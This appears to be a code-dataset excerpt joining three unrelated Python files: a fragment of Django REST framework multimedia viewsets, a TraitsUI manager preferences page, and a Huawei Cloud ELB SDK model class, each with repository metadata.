queryset = MulUserModel.objects.all()
serializer_class = UserAvatarSerializer
permission_classes = (permissions.IsAuthenticated,)
parser_classes = (MultiPartParser, FormParser,)
@get_user_token
#@get_multimedia
#def create_img(self, request, pk=None):
def create_img(self, obj):
print("l")
obj.temp_file = self.request.FILES.get('image')
print("obj")
print(obj)
"""
class MultimediaUser(viewsets.ModelViewSet):
queryset = MulUserModel.objects.all()
serializer_class = MulUserSerializer
permission_classes = (permissions.IsAuthenticated,)
@get_user_token
#@get_multimedia
def create_post(self, request, pk=None):
print("l")
class MultimediaCategory(viewsets.ModelViewSet):
queryset = MulCatModel.objects.all()
serializer_class = MulCatSerializer
permission_classes = (permissions.IsAuthenticated,)
def perform_create(self, serializer):
serializer.save()
class MultimediaSubcategory(viewsets.ModelViewSet):
queryset = MulSubCModel.objects.all()
serializer_class = MulSubCSerializer
permission_classes = (permissions.IsAuthenticated,)
def perform_create(self, serializer):
serializer.save()
class MultimediaPost(viewsets.ModelViewSet):
queryset = MulPostModel.objects.all()
serializer_class = MulPostSerializer
permission_classes = (permissions.IsAuthenticated,)
def perform_create(self, serializer):
serializer.save()
|
[
"giovanniyatze@gmail.com"
] |
giovanniyatze@gmail.com
|
d2c68acf9b53244d3d86dcddc2dfb141b3295ea1
|
99d7a6448a15e7770e3b6f3859da043300097136
|
/src/managers/plugins/manager_preferences_page.py
|
108378a6b8bff9ec02512d2ba1c2ea9974fed843
|
[] |
no_license
|
softtrainee/arlab
|
125c5943f83b37bc7431ae985ac7b936e08a8fe4
|
b691b6be8214dcb56921c55daed4d009b0b62027
|
refs/heads/master
| 2020-12-31T07:54:48.447800
| 2013-05-06T02:49:12
| 2013-05-06T02:49:12
| 53,566,313
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,279
|
py
|
#===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#===============================================================================
#============= enthought library imports =======================
from traits.api import HasTraits, Str, Bool, Float, List, on_trait_change, \
Range, Instance
from traitsui.api import View, Item, VGroup, TableEditor, Group, HGroup
from apptools.preferences.ui.api import PreferencesPage
from traitsui.table_column import ObjectColumn
from traitsui.extras.checkbox_column import CheckboxColumn
#============= standard library imports ========================
#============= local library imports ==========================
from src.helpers.parsers.initialization_parser import InitializationParser
class CItem(HasTraits):
enabled = Bool
name = Str
class ManagerPreferencesPage(PreferencesPage):
'''
abstract class. should not be used directly
ensure subclass sets plugin_name
'''
devices = List(transient=True)
managers = List(transient=True)
plugin_name = None
open_on_startup = Bool
enable_close_after = Bool
close_after = Range(0, 60, 60)
width = Float(-1)
height = Float(0.85)
x = Float(10)
y = Float(20)
parser = Instance(InitializationParser, (), transient=True)
@on_trait_change('managers:enabled')
def _managers_changed(self, obj, name, old, new):
if new:
self.parser.enable_manager(obj.name, self.plugin_name)
else:
self.parser.disable_manager(obj.name, self.plugin_name)
@on_trait_change('devices:enabled')
def _devices_changed(self, obj, name, old, new):
if new:
self.parser.enable_device(obj.name, self.plugin_name)
else:
self.parser.disable_device(obj.name, self.plugin_name)
def _managers_default(self):
r = []
# get the plugin this manager belongs to
plugin = self.parser.get_plugin(self.plugin_name)
mans = self.parser.get_managers(plugin, element=True, all=True)
if mans is not None:
r = [CItem(enabled=True if m.get('enabled').lower() == 'true' else False,
name=m.text.strip()
)
for m in mans]
return r
def _devices_default(self):
r = []
# get the plugin this manager belongs to
plugin = self.parser.get_plugin(self.plugin_name)
devs = self.parser.get_devices(plugin, element=True, all=True)
if devs is not None:
r = [CItem(enabled=True if d.get('enabled').lower() == 'true' else False,
name=d.text.strip()
)
for d in devs]
return r
def get_additional_groups(self):
return []
def get_general_group(self):
window_grp = Group('width',
'height',
'x', 'y')
return Group(Item('open_on_startup'),
HGroup(
Item('close_after', enabled_when='enable_close_after'),
Item('enable_close_after', show_label=False)
),
window_grp
)
#============= views ===================================
def traits_view(self):
'''
'''
cols = [CheckboxColumn(name='enabled',
),
ObjectColumn(name='name', editable=False)
]
table_editor = TableEditor(columns=cols)
devices_group = VGroup(Item('devices', show_label=False,
editor=table_editor,
height=400
),
label='Devices'
)
manager_group = VGroup(Item('managers', show_label=False,
editor=table_editor,
height=400
),
label='Managers'
)
grp = Group(
manager_group,
devices_group,
layout='tabbed')
ggrp = self.get_general_group()
if ggrp is not None:
ggrp.label = 'General'
grp.content.insert(0, ggrp)
for ag in self.get_additional_groups():
grp.content.append(ag)
v = View(
grp
)
return v
#============= EOF ==============================================
|
[
"jirhiker@localhost"
] |
jirhiker@localhost
|
e6808933779bd451c7f3c2aed9096baf82d6ac01
|
a2d36e471988e0fae32e9a9d559204ebb065ab7f
|
/huaweicloud-sdk-elb/huaweicloudsdkelb/v2/model/l7rules_in_status_resp.py
|
ff144526f91124a278e439806850ab972c0a4e27
|
[
"Apache-2.0"
] |
permissive
|
zhouxy666/huaweicloud-sdk-python-v3
|
4d878a90b8e003875fc803a61414788e5e4c2c34
|
cc6f10a53205be4cb111d3ecfef8135ea804fa15
|
refs/heads/master
| 2023-09-02T07:41:12.605394
| 2021-11-12T03:20:11
| 2021-11-12T03:20:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,606
|
py
|
# coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class L7rulesInStatusResp:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'type': 'str',
'id': 'str',
'provisioning_status': 'str'
}
attribute_map = {
'type': 'type',
'id': 'id',
'provisioning_status': 'provisioning_status'
}
def __init__(self, type=None, id=None, provisioning_status=None):
"""L7rulesInStatusResp - a model defined in huaweicloud sdk"""
self._type = None
self._id = None
self._provisioning_status = None
self.discriminator = None
self.type = type
self.id = id
self.provisioning_status = provisioning_status
@property
def type(self):
"""Gets the type of this L7rulesInStatusResp.
转发规则的匹配内容。PATH:匹配请求中的路径;HOST_NAME:匹配请求中的域名
:return: The type of this L7rulesInStatusResp.
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this L7rulesInStatusResp.
转发规则的匹配内容。PATH:匹配请求中的路径;HOST_NAME:匹配请求中的域名
:param type: The type of this L7rulesInStatusResp.
:type: str
"""
self._type = type
@property
def id(self):
"""Gets the id of this L7rulesInStatusResp.
转发规则ID
:return: The id of this L7rulesInStatusResp.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this L7rulesInStatusResp.
转发规则ID
:param id: The id of this L7rulesInStatusResp.
:type: str
"""
self._id = id
@property
def provisioning_status(self):
"""Gets the provisioning_status of this L7rulesInStatusResp.
转发规则的配置状态;该字段为预留字段,暂未启用。默认为ACTIVE。
:return: The provisioning_status of this L7rulesInStatusResp.
:rtype: str
"""
return self._provisioning_status
@provisioning_status.setter
def provisioning_status(self, provisioning_status):
"""Sets the provisioning_status of this L7rulesInStatusResp.
转发规则的配置状态;该字段为预留字段,暂未启用。默认为ACTIVE。
:param provisioning_status: The provisioning_status of this L7rulesInStatusResp.
:type: str
"""
self._provisioning_status = provisioning_status
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, L7rulesInStatusResp):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.